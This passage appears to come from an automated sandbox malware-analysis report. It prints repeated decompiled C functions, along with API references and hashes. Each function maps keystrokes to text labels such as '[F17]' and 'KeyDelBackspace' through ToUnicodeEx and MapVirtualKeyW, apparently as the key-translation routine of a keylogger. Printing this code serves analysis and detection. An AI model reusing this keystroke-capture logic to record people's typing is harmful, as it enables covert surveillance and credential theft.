					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073fe
0x100073fe
0x10007405
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F15], xrefs: 10007400

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F15]
API String ID: 783433895-1756857771
Opcode ID: f8b9d19cacf00eabcfa74d6abe32546b7e715af37a9aab5616ce0c298a08cd1d
Instruction ID: a3abf2809a5496e46b19b8e66a7b892f1753b03d83a72077e8ed13536b214ed3
Opcode Fuzzy Hash: f8b9d19cacf00eabcfa74d6abe32546b7e715af37a9aab5616ce0c298a08cd1d
Instruction Fuzzy Hash: 9531C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000740F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000740F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F16]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000740f
0x1000740f
0x10007416
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F16], xrefs: 10007411

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F16]
API String ID: 783433895-1134220904
Opcode ID: 8801c05138b566acd2804adc7f16252f9de8661d5aa877f6d0b8586ef6fde810
Instruction ID: 9ded0a974e7829e14449a0db8178bd5f1510f0ab5ff1090cc1a9a41416e86c25
Opcode Fuzzy Hash: 8801c05138b566acd2804adc7f16252f9de8661d5aa877f6d0b8586ef6fde810
Instruction Fuzzy Hash: 2831C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007420, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007420(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F17]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007420
0x10007420
0x10007427
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[F17], xrefs: 10007422
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F17]
API String ID: 783433895-1518462761
Opcode ID: 89e69890d16f782e70caca9f1ed976a7ef2713fc690923ff71a1332dafe3380d
Instruction ID: 2ed4a8681e7407375f66ccd48db4609f3149d056e008a571d680b5df1c264ba8
Opcode Fuzzy Hash: 89e69890d16f782e70caca9f1ed976a7ef2713fc690923ff71a1332dafe3380d
Instruction Fuzzy Hash: 8231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007431, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007431(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F18]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007431
0x10007431
0x10007438
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F18], xrefs: 10007433

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F18]
API String ID: 783433895-3709467622
Opcode ID: 6d6948c150d618c0e6ff589f068a60c306c83d8aae76315f58b2b8978f8f552d
Instruction ID: 149d1606a04f5e631dce96eb90406079d1e697c39fef19b4217db4c894f8743d
Opcode Fuzzy Hash: 6d6948c150d618c0e6ff589f068a60c306c83d8aae76315f58b2b8978f8f552d
Instruction Fuzzy Hash: 2C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C4A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007442, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007442(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F19]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007442
0x10007442
0x10007449
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[F19], xrefs: 10007444
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F19]
API String ID: 783433895-3288517287
Opcode ID: fdf93db7dfc6a872f4b4257a607c2791a5697a33a6d87c52e9f2c4f7bf3239d7
Instruction ID: c1d88a8a83b3fff2f0a92d393676b3d9be71f05b44633e1edb0896168ba610e4
Opcode Fuzzy Hash: fdf93db7dfc6a872f4b4257a607c2791a5697a33a6d87c52e9f2c4f7bf3239d7
Instruction Fuzzy Hash: 6F31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007453, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007453(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F2]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007453
0x10007453
0x1000745a
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F2], xrefs: 10007455

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
